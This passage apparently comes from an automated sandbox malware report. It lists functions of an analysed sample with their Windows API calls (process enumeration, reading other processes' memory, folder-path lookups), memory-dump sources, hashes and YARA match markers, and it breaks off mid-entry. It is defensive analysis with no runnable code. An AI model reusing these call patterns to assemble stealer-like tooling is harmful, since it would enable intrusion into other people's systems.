                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
                                                    • String ID: vector<T> too long$yxxx$yxxx
                                                    • API String ID: 2884196479-1517697755
                                                    • Opcode ID: a9d6882bbc2a6b05e7acd6381be3345c5a12b386bb702fb3c3b73543a5313761
                                                    • Instruction ID: e0d1b7fbc79543eee78ba1c3596c29abb19376f5ed5f905b3ee67b4588712001
                                                    • Opcode Fuzzy Hash: a9d6882bbc2a6b05e7acd6381be3345c5a12b386bb702fb3c3b73543a5313761
                                                    • Instruction Fuzzy Hash: 74F09027B100310BC314A43E9E8405FA94657E539037AD77AE986FF38DEC39EC8281D9
                                                    Function 0249C347 Relevance: 6.4, APIs: 5, Instructions: 105stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0249C387
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID:
                                                    • API String ID: 3722407311-0
                                                    • Opcode ID: 1c5fd1aee031a04934ccf0036cf40de410e2b33f36f19f6dc211c43ea24ae74d
                                                    • Instruction ID: 9d86675ad8c32be9e3ed4450e39d87c14e810f662d8174455aae49e1f7a736e6
                                                    • Opcode Fuzzy Hash: 1c5fd1aee031a04934ccf0036cf40de410e2b33f36f19f6dc211c43ea24ae74d
                                                    • Instruction Fuzzy Hash: CD31AE70E10295ABDF21EFB5DC88A6E7BF6AF49308F04406BE801A7251D7B4C942DF94
                                                    Function 0249F077 Relevance: 6.3, APIs: 5, Instructions: 93stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0249F0A6
                                                    • lstrlen.KERNEL32(00000000), ref: 0249F0B4
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249F0DB
                                                    • lstrlen.KERNEL32(00000000), ref: 0249F0E2
                                                    • lstrcpy.KERNEL32(00000000,00435550), ref: 0249F116
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrlen
                                                    • String ID:
                                                    • API String ID: 367037083-0
                                                    • Opcode ID: 7ff5473b33befaf4bf86454810e886e9f076d7ed90fc08bef7258d5762623844
                                                    • Instruction ID: cc7a18747186cf37b1a2c6b702b9f9034c66af864c2db7751dc89c32fea10b40
                                                    • Opcode Fuzzy Hash: 7ff5473b33befaf4bf86454810e886e9f076d7ed90fc08bef7258d5762623844
                                                    • Instruction Fuzzy Hash: 0D31A271A111946BCB22FF39DC48E9E7FA6AF00308F01442AEC05DBA12EB74D8069F90
                                                    Function 024A3C57 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 024A7477: lstrcpy.KERNEL32(00000000,ERROR), ref: 024A7495
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 024A3C9D
                                                    • Process32First.KERNEL32(00000000,00000128), ref: 024A3CB0
                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 024A3CC6
                                                      • Part of subcall function 024A75A7: lstrlen.KERNEL32(------,02485D82), ref: 024A75B2
                                                      • Part of subcall function 024A75A7: lstrcpy.KERNEL32(00000000), ref: 024A75D6
                                                      • Part of subcall function 024A75A7: lstrcat.KERNEL32(?,------), ref: 024A75E0
                                                      • Part of subcall function 024A7517: lstrcpy.KERNEL32(00000000), ref: 024A7545
                                                    • CloseHandle.KERNEL32(00000000), ref: 024A3DFE
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                    • String ID:
                                                    • API String ID: 1066202413-0
                                                    • Opcode ID: 82af6a87d116d7bb212dd170a1a9c1db20d24ae88398105aa954db5ce135ee20
                                                    • Instruction ID: beacb7f0d724c948cf7c9aa46dd5f1bec475e48726a3c6f9094fa46f46abaee9
                                                    • Opcode Fuzzy Hash: 82af6a87d116d7bb212dd170a1a9c1db20d24ae88398105aa954db5ce135ee20
                                                    • Instruction Fuzzy Hash: AB81E770901215CFC715CF18D998B96BBB2BB54329F29C1EEE4095B3A1E776D882CF90
                                                    Function 0249E8A7 Relevance: 6.2, APIs: 4, Instructions: 157stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0249E8F2
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249E927
                                                    • lstrcat.KERNEL32(?,00000000), ref: 0249E933
                                                    • lstrcat.KERNEL32(?,00638B00), ref: 0249E94C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$FolderPathlstrcpy
                                                    • String ID:
                                                    • API String ID: 818526691-0
                                                    • Opcode ID: c65d1d44db8386614dc42ff9ff295385bfe415a91f88419aa20b038886f978f3
                                                    • Instruction ID: de7a87665bc0a323f6f208f4deb64f4b7c2a632083408dd95fd76cf55e685818
                                                    • Opcode Fuzzy Hash: c65d1d44db8386614dc42ff9ff295385bfe415a91f88419aa20b038886f978f3
                                                    • Instruction Fuzzy Hash: AF51C571600244AFD754FF64DC41EEE7BAAAF84314F40891FB98983251EE74E909CF92
                                                    Function 024A2443 Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00064000,00000000), ref: 024A2469
                                                    • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 024A2545
                                                    • VirtualQueryEx.KERNEL32(00000000,?,?,0000001C), ref: 024A25A7
                                                    • ??_V@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,024A2686), ref: 024A25B9
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MemoryProcessRead$QueryVirtual
                                                    • String ID:
                                                    • API String ID: 268806267-0
                                                    • Opcode ID: 657223b197f249347193c7e8189b6792d9a4a43cf19b981f0f7ccf5a3022f747
                                                    • Instruction ID: 8c3188670cf157a6819ab1e1ff792c31dde1e7a18be77bb3c544e9ffaced6568
                                                    • Opcode Fuzzy Hash: 657223b197f249347193c7e8189b6792d9a4a43cf19b981f0f7ccf5a3022f747
                                                    • Instruction Fuzzy Hash: CF41B071A042199BDB20CFA4D9A4BAF77B6FB94724F14412AED15E7340D370D941DB90
                                                    Function 02484BE7 Relevance: 6.1, APIs: 4, Instructions: 115memorystringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02484C22
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02484C29
                                                    • strlen.MSVCRT ref: 02484CB6
                                                    • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 02484D37
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocateProcessProtectVirtualstrlen
                                                    • String ID:
                                                    • API String ID: 2355128949-0
                                                    • Opcode ID: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
                                                    • Instruction ID: 3540da17bdc7f10a15f003eb6127ef4de36cae22e3e2a380fedeff557588b1de
                                                    • Opcode Fuzzy Hash: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
                                                    • Instruction Fuzzy Hash: 2E31E920F4833C7F86206BA56C46BDFBED4DF8E760F389053F50856188C9A86405CEEA
                                                    Function 02498027 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0249803F
                                                      • Part of subcall function 024AA457: std::exception::exception.LIBCMT ref: 024AA46C
                                                      • Part of subcall function 024AA457: __CxxThrowException@8.LIBCMT ref: 024AA481
                                                      • Part of subcall function 024AA457: std::exception::exception.LIBCMT ref: 024AA492
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0249805D
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 02498078
                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,02497F61,00000000,?,?,00000000,?,0248941D,?), ref: 024980DB
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throwmemcpy
                                                    • String ID:
                                                    • API String ID: 285807467-0
                                                    • Opcode ID: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
                                                    • Instruction ID: 460d250d67548057d60c82658b763e13481bff061abd0a0cd41d904b69fdfa27
                                                    • Opcode Fuzzy Hash: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
                                                    • Instruction Fuzzy Hash: 7221D7313007004FD725DE2CDD90A2ABBE6EF96714F214A2FE5458B341D771D841CB55
                                                    Function 02498329 Relevance: 6.1, APIs: 4, Instructions: 91stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • strtok_s.MSVCRT ref: 0249836C
                                                    • lstrlen.KERNEL32(00000000), ref: 024983B2
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024983E1
                                                    • StrCmpCA.SHLWAPI(00000000,00435204), ref: 024983F9
                                                    • lstrlen.KERNEL32(00000000), ref: 02498437
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02498466
                                                    • strtok_s.MSVCRT ref: 02498476
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpylstrlenstrtok_s
                                                    • String ID:
                                                    • API String ID: 3280532728-0
                                                    • Opcode ID: 768ebda093904729c8ef10212cc4165ce45b8672bbd804984e3020a17807c801
                                                    • Instruction ID: 445ac715c7424353800aad8691c62f0cae3f52f78918d9722f6b39ddaff52190
                                                    • Opcode Fuzzy Hash: 768ebda093904729c8ef10212cc4165ce45b8672bbd804984e3020a17807c801
                                                    • Instruction Fuzzy Hash: B721E171900245ABCB22DF6CDC48B9EBFB4EF46314F14419EEC499B281EB76D946CB90
                                                    Function 0249EF37 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0249EF7B
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249EFAA
                                                    • lstrcat.KERNEL32(?,00000000), ref: 0249EFB8
                                                    • lstrcat.KERNEL32(?,00638930), ref: 0249EFD3
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$FolderPathlstrcpy
                                                    • String ID:
                                                    • API String ID: 818526691-0
                                                    • Opcode ID: 47fe55243a5b675cfebcab6b4270073509a08879d7f49bdfeb7ce43fa0e36e6f
                                                    • Instruction ID: 2985ea93f4bc2a8e7b464b273e7744a12f20c2ffd00f0649aef60acbd3342621
                                                    • Opcode Fuzzy Hash: 47fe55243a5b675cfebcab6b4270073509a08879d7f49bdfeb7ce43fa0e36e6f
                                                    • Instruction Fuzzy Hash: CC3160B1A11198ABCB10EF74DC44BED7BB6AF48304F10046AEA4997291DBB0AE459F94
                                                    Function 0249CBA7 Relevance: 6.1, APIs: 4, Instructions: 84stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • strtok_s.MSVCRT ref: 0249CBCC
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0249CC09
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0249CC38
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$strtok_s
                                                    • String ID:
                                                    • API String ID: 2610293679-0
                                                    • Opcode ID: 8cea76b7066e1e6dea59191d9541f2afd9edfcda81442690cd798c04227f8123
                                                    • Instruction ID: 2ede88a40ed92a477522c51bb6b111f787dcc6fc374744b7b719b97305dfb4cc
                                                    • Opcode Fuzzy Hash: 8cea76b7066e1e6dea59191d9541f2afd9edfcda81442690cd798c04227f8123
                                                    • Instruction Fuzzy Hash: 42215E71E00258AADB21EFB5DC88AAE7FB59F0C308F04446BD805E7251D774D946DBA4
                                                    Function 02498F67 Relevance: 6.1, APIs: 4, Instructions: 52stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcessstrtok_s
                                                    • String ID:
                                                    • API String ID: 3407564107-0
                                                    • Opcode ID: 8c38b9cd795a4e66d2f7726302c2b9813b2bd047927f0b7650dd2b94d46ae7f4
                                                    • Instruction ID: 1dca685eb130c174b692adbb979f35605a6f91c238c13b7bc5eb49d07455f466
                                                    • Opcode Fuzzy Hash: 8c38b9cd795a4e66d2f7726302c2b9813b2bd047927f0b7650dd2b94d46ae7f4
                                                    • Instruction Fuzzy Hash: B4019675900209FFDF10DFA8DC84C9E7BB9EF84304B00447AF90A97200E7759A458BA5
                                                    Function 024A2D67 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,00000000,0042A400,000000FF), ref: 024A2D96
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 024A2D9D
                                                    • GetLocalTime.KERNEL32(?), ref: 024A2DA9
                                                    • wsprintfA.USER32 ref: 024A2DD5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                    • String ID:
                                                    • API String ID: 377395780-0
                                                    • Opcode ID: c677d558a221d97c8446b2720690b2c9f8584bb4bc7dd71c902c6d27fd94e7e5
                                                    • Instruction ID: ef460e4f05b1cc59e4f337cdf8022e820f68ef2e8f2f31b22460d179b2b2908b
                                                    • Opcode Fuzzy Hash: c677d558a221d97c8446b2720690b2c9f8584bb4bc7dd71c902c6d27fd94e7e5
                                                    • Instruction Fuzzy Hash: 720112B2904624ABCB149BD9DD45FBFB7BDFB4CB11F00011AF645A2290E7B85940C7B5
                                                    Function 0249CCC4 Relevance: 6.0, APIs: 4, Instructions: 43stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • StrCmpCA.SHLWAPI(?,00435204), ref: 0249CCCA
                                                    • StrCmpCA.SHLWAPI(?,00432240,?,00435204), ref: 0249CCE1
                                                    • StrCmpCA.SHLWAPI(?,00435208,?,00432240,?,00435204), ref: 0249CCF8
                                                    • strtok_s.MSVCRT ref: 0249CDEE
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: strtok_s
                                                    • String ID:
                                                    • API String ID: 3330995566-0
                                                    • Opcode ID: 1572ee6a45b470ea637e1ee38e1c5acc8a37ed15ab43c52a1683d59de8c54d74
                                                    • Instruction ID: 7ae046c56aa34341e63fbfdd5a4472688e45a0aaff0910f287220cd419d8bba9
                                                    • Opcode Fuzzy Hash: 1572ee6a45b470ea637e1ee38e1c5acc8a37ed15ab43c52a1683d59de8c54d74
                                                    • Instruction Fuzzy Hash: 9E01A271A41224A7CF119FA5DC88BDE7FA5AF04705F10405BEC05AB240E7B89646CEA5
                                                    Function 024A4707 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 024A4719
                                                    • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 024A4734
                                                    • CloseHandle.KERNEL32(00000000), ref: 024A473B
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024A476E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                                    • String ID:
                                                    • API String ID: 4028989146-0
                                                    • Opcode ID: 773b4253516a6d5192202977a408014d72df6e4392408074aa70a8579cbf93d5
                                                    • Instruction ID: ee8879669338977e6057005112f777838ef0432c6bf6d4b33f373059c62a1d87
                                                    • Opcode Fuzzy Hash: 773b4253516a6d5192202977a408014d72df6e4392408074aa70a8579cbf93d5
                                                    • Instruction Fuzzy Hash: ADF0F6B49016656FE720AB749D8CBEEBBB9DF15704F1001A5FA45D7280DBF088848BE0
                                                    Function 004087B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0040880C
                                                    • memcpy.MSVCRT(?,?,00000000,00000000,004077D7), ref: 00408852
                                                      • Part of subcall function 004089B0: std::_Xinvalid_argument.LIBCPMT ref: 004089C6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Xinvalid_argumentstd::_$memcpy
                                                    • String ID: string too long
                                                    • API String ID: 2304785028-2556327735
                                                    • Opcode ID: 510cf4668b88527fe00a13118a3b5303f5f61e3204e0d9fa691029505446f86d
                                                    • Instruction ID: 5d491b80eb8bee1d23d11014c6f0c6c09838216a0de1fe5473ebb2330092f83f
                                                    • Opcode Fuzzy Hash: 510cf4668b88527fe00a13118a3b5303f5f61e3204e0d9fa691029505446f86d
                                                    • Instruction Fuzzy Hash: 9421A1613006504BDB259A6C8B84A2AB7E5AB82700B64493FF0D1D77C1DFB9DC40879D
                                                    Function 02488AE7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 02488B1A
                                                      • Part of subcall function 024AA40A: std::exception::exception.LIBCMT ref: 024AA41F
                                                      • Part of subcall function 024AA40A: __CxxThrowException@8.LIBCMT ref: 024AA434
                                                      • Part of subcall function 024AA40A: std::exception::exception.LIBCMT ref: 024AA445
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                    • String ID: yxxx$yxxx
                                                    • API String ID: 1823113695-1021751087
                                                    • Opcode ID: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
                                                    • Instruction ID: fafc073e34519c1cee4ab1a038e029e19624e8941c2e1c955685c5ae563040f3
                                                    • Opcode Fuzzy Hash: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
                                                    • Instruction Fuzzy Hash: 393147B5E005199FCB08DF59C8916AEBBB6EB88310F14826AE915AF344D735A901CBD1
                                                    Function 00408A90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00408AA5
                                                      • Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
                                                      • Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD
                                                    • memcpy.MSVCRT(?,?,?), ref: 00408AEF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Exception@8ThrowXinvalid_argumentmemcpystd::_std::exception::exception
                                                    • String ID: string too long
                                                    • API String ID: 2475949303-2556327735
                                                    • Opcode ID: cf6b60b1bc04ba4a2ac18f1f7a23f9c920bac7eb4e79507fd8cda2023fcf2671
                                                    • Instruction ID: fcf71bdc140fe32093c9f7753cd2ddaa01766cb0764a4124a3dd8a078f1da807
                                                    • Opcode Fuzzy Hash: cf6b60b1bc04ba4a2ac18f1f7a23f9c920bac7eb4e79507fd8cda2023fcf2671
                                                    • Instruction Fuzzy Hash: C02125727046045BE720CE6DDA4062BB7E6EBD5320F148A3FE885D33C0DF74A9418798
                                                    Function 024A5B97 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 024A5BA9
                                                      • Part of subcall function 024AA40A: std::exception::exception.LIBCMT ref: 024AA41F
                                                      • Part of subcall function 024AA40A: __CxxThrowException@8.LIBCMT ref: 024AA434
                                                      • Part of subcall function 024AA40A: std::exception::exception.LIBCMT ref: 024AA445
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 024A5BBC
                                                    Strings
                                                    • Sec-WebSocket-Version: 13, xrefs: 024A5BAE
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                    • String ID: Sec-WebSocket-Version: 13
                                                    • API String ID: 963545896-4220314181
                                                    • Opcode ID: 625f04cb9a0d46676825a7364065e981b88a445be79eb14be35e872224d31c74
                                                    • Instruction ID: 3590620c6d25da15b08db0a624057009154c049b5445afc645439f9839185ffb
